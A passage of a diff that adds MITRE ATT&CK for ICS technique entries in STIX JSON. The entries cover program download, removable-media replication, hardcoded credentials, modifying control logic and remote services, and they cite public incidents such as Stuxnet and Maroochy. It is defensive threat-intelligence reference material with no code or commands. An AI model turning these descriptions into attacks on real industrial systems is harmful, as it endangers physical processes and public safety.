"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0849", + "external_id": "T0849" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Program Download", + "description": "Adversaries may perform a program download to transfer a user program to a controller. \n\nVariations of program download, such as online edit and program append, allow a controller to continue running during the transfer and reconfiguration process without interruption to process control. However, before starting a full program download (i.e., download all) a controller may need to go into a stop state. This can have negative consequences on the physical process, especially if the controller is not able to fulfill a time-sensitive action. Adversaries may choose to avoid a download all in favor of an online edit or program append to avoid disrupting the physical process. An adversary may need to use the technique Detect Operating Mode or Change Operating Mode to make sure the controller is in the proper mode to accept a program download.\n\nThe granularity of control to transfer a user program in whole or parts is dictated by the management protocol (e.g., S7CommPlus, TriStation) and underlying controller API. Thus, program download is a high-level term for the suite of vendor-specific API calls used to configure a controllers user program memory space. 
\n\n[Modify Controller Tasking](https://attack.mitre.org/techniques/T0821) and [Modify Program](https://attack.mitre.org/techniques/T0889) represent the configuration changes that are transferred to a controller via a program download.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Asset: Asset Inventory", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0843", + "external_id": "T0843" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Replication Through Removable Media", + "description": "Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible. 
\n\nOperators of the German nuclear power plant, Gundremmingen, discovered malware on a facility computer not connected to the internet. (Citation: Kernkraftwerk Gundremmingen April 2016) (Citation: Trend Micro April 2016) The malware included Conficker and W32.Ramnit, which were also found on eighteen removable disk drives in the facility. (Citation: Christoph Steitz, Eric Auchard April 2016) (Citation: Catalin Cimpanu April 2016) (Citation: Peter Dockrill April 2016) (Citation: Lee Mathews April 2016) (Citation: Sean Gallagher April 2016) (Citation: Dark Reading Staff April 2016) The plant has since checked for infection and cleaned up more than 1,000 computers. (Citation: BBC April 2016) An ESET researcher commented that internet disconnection does not guarantee system safety from infection or payload execution. (Citation: ESET April 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Data Historian", + "Control Server" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "File: File Creation", + "File: File Access", + "Drive: Drive Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0847", + "external_id": "T0847" + }, + { + "source_name": "BBC April 2016", + "description": "BBC 2016, April 28 German nuclear plant hit by computer viruses Retrieved. 
2019/10/14 ", + "url": "https://www.bbc.com/news/technology-36158606" + }, + { + "source_name": "Catalin Cimpanu April 2016", + "description": "Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14 ", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + }, + { + "source_name": "Christoph Steitz, Eric Auchard April 2016", + "description": "Christoph Steitz, Eric Auchard 2016, April 26 German nuclear plant infected with computer viruses, operator says Retrieved. 2019/10/14 ", + "url": "https://www.reuters.com/article/us-nuclearpower-cyber-germany/german-nuclear-plant-infected-with-computer-viruses-operator-says-idUSKCN0XN2OS" + }, + { + "source_name": "Dark Reading Staff April 2016", + "description": "Dark Reading Staff 2016, April 28 German Nuclear Power Plant Infected With Malware Retrieved. 2019/10/14 ", + "url": "https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298" + }, + { + "source_name": "ESET April 2016", + "description": "ESET 2016, April 28 Malware found at a German nuclear power plant Retrieved. 2019/10/14 ", + "url": "https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/" + }, + { + "source_name": "Kernkraftwerk Gundremmingen April 2016", + "description": "Kernkraftwerk Gundremmingen 2016, April 25 Detektion von Bro-Schadsoftware an mehreren Rechnern Retrieved. 2019/10/14 ", + "url": "https://www.kkw-gundremmingen.de/presse.php?id=571" + }, + { + "source_name": "Lee Mathews April 2016", + "description": "Lee Mathews 2016, April 27 German nuclear plant found riddled with Conficker, other viruses Retrieved. 
2019/10/14 ", + "url": "https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/" + }, + { + "source_name": "Peter Dockrill April 2016", + "description": "Peter Dockrill 2016, April 28 Multiple Computer Viruses Have Been Discovered in This German Nuclear Plant Retrieved. 2019/10/14 ", + "url": "https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant" + }, + { + "source_name": "Sean Gallagher April 2016", + "description": "Sean Gallagher 2016, April 27 German nuclear plants fuel rod system swarming with old malware Retrieved. 2019/10/14 ", + "url": "https://arstechnica.com/information-technology/2016/04/german-nuclear-plants-fuel-rod-system-swarming-with-old-malware/" + }, + { + "source_name": "Trend Micro April 2016", + "description": "Trend Micro 2016, April 27 Malware Discovered in German Nuclear Power Plant Retrieved. 2019/10/14 ", + "url": "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/malware-discovered-in-german-nuclear-power-plant" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Screen Capture", + "description": "Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. 
(Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0852", + "external_id": "T0852" + }, + { + "source_name": "ICS-CERT October 2017", + "description": "ICS-CERT 2017, October 21 Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2017/10/23 ", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Hardcoded Credentials", + "description": "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. 
Examples credentials that may be hardcoded in an asset include:\n\n* Username/Passwords\n* Cryptographic keys/Certificates\n* API tokens\n\nUnlike [Default Credentials](https://attack.mitre.org/techniques/T0812), these credentials are built into the system in a way that they either cannot be changed by the asset owner, or may be infeasible to change because of the impact it would cause to the control system operation. These credentials may be reused across whole product lines or device models and are often not published or known to the owner and operators of the asset. \n\nAdversaries may utilize these hardcoded credentials to move throughout the control system environment or provide reliable access for their tools to interact with industrial assets. \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Aagam Shah, @neutrinoguy, ABB" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server", + "Data Historian", + "Human-Machine Interface", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Logon Session: Logon Session Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "created": "2022-09-29T13:35:38.589Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0891", + 
"external_id": "T0891" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Valid Accounts", + "description": "Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. \n\nAdversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence. (Citation: Booz Allen Hamilton) \n\nThe overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) and possibly between the enterprise and operational technology environments. 
Adversaries may be able to leverage valid credentials from one system to gain access to another system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Engineering Workstation", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata", + "Logon Session: Logon Session Creation", + "User Account: User Account Authentication" + ], + "type": "attack-pattern", + "id": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0859", + "external_id": "T0859" + }, + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-09-27T16:38:58.028Z", + "name": "Exploitation for Privilege Escalation", + "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. 
Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. (Citation: The MITRE Corporation) \n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods. 
(Citation: The MITRE Corporation)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "created": "2021-04-13T12:08:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0890", + "external_id": "T0890" + }, + { + "source_name": "The MITRE Corporation", + "description": "The MITRE Corporation The MITRE Corporation ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ", + "url": "https://attack.mitre.org/techniques/T1068/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Remote System Discovery", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used. 
(Citation: Enterprise ATT&CK January 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0846", + "external_id": "T0846" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Remote System Discovery Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1018" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Engineering Workstation Compromise", + "description": "Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment. Access to an engineering workstation may occur through or physical means, such as a Valid Accounts with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. 
For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to, and control of, other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0818", + "external_id": "T0818" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Connection Proxy", + "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.\n\nThe definition of a proxy can also be expanded to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.\n\nThe network may be within a single organization or 
across multiple organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. (Citation: Enterprise ATT&CK January 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0884", + "external_id": "T0884" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Connection Proxy Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1090" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Standard Application Layer Protocol", + "description": "Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. 
These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0869", + "external_id": "T0869" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21T17:43:26.506Z", + "modified": "2022-05-06T17:47:24.401Z", + "name": "Modify Control Logic", + "description": "Adversaries may place malicious code in a system, which can cause 
the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates. \n\nProgram code is normally edited in a vendor-specific Integrated Development Environment (IDE) that relies on proprietary tools and features. These IDEs allow an engineer to perform host target development and may have the ability to run the code on the machine it is programmed for. The IDE will transmit the control logic to the testing device, and will perform the required device-specific functions to apply the changes and make them active.\n\nAn adversary may attempt to use this host target IDE to modify device control logic. Even though proprietary tools are often used to edit and update control logic, the process can usually be reverse-engineered and reproduced with open-source tools.\n\nAn adversary can de-calibrate a sensor by removing functions in control logic that account for sensor error. This can be used to change a control process without actually spoofing command messages to a controller or device. \n\nIt is believed this process happened in the lesser known over-pressurizer attacks build into Stuxnet. Pressure sensors are not perfect at translating pressure into an analog output signal, but their errors can be corrected by calibration. The pressure controller can be told what the “real” pressure is for given analog signals and then automatically linearize the measurement to what would be the “real” pressure. If the linearization is overwritten by malicious code on the S7-417 controller, analog pressure readings will be “corrected” during the attack by the pressure controller, which then interprets all analog pressure readings as perfectly normal pressure no matter how high or low their analog values are. 
The pressure controller then acts accordingly by never opening the stage exhaust valves. In the meantime, actual pressure keeps rising. (Citation: Stuxnet - Langner - 201311)\n\nIn the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. (Citation: Maroochy - MITRE - 200808)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0833", + "external_id": "T0833" + }, + { + "source_name": "Stuxnet - Langner - 201311", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved March 27, 2018.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + }, + { + "source_name": "Maroochy - MITRE - 200808", + "description": "Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. 
Retrieved March 27, 2018.", + "url": "https://www.mitre.org/sites/default/files/pdf/08%201145.pdf" + } + ], + "x_mitre_deprecated": true, + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Remote Services", + "description": "Adversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: Joe Slowik April 2019) \n\nRemote services could be used to support remote access, data transmission, authentication, name resolution, and other remote functions. Further, remote services may be necessary to allow operators and administrators to configure systems within the network from their engineering or management workstations. 
An adversary may use this technique to access devices which may be dual-homed (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) to multiple network segments, and can be used for [Program Download](https://attack.mitre.org/techniques/T0843) or to execute attacks on control devices directly through [Valid Accounts](https://attack.mitre.org/techniques/T0859).\n\nSpecific remote services (RDP & VNC) may be a precursor to enable [Graphical User Interface](https://attack.mitre.org/techniques/T0823) execution on devices such as HMIs or engineering workstation software.\n\nBased on incident data, CISA and FBI assessed that Chinese state-sponsored actors also compromised various authorized remote access channels, including systems designed to transfer data and/or allow access between corporate and ICS networks. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Daisuke Suzuki" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface", + "Control Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Module: Module Load", + "Network Share: Network Share Access", + "Process: Process Creation", + "Logon Session: Logon Session Creation", + "Network Traffic: Network Connection Creation", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "created": 
"2021-04-12T19:26:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0886", + "external_id": "T0886" + }, + { + "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017", + "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + }, + { + "source_name": "Dragos December 2017", + "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", + "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf" + }, + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 
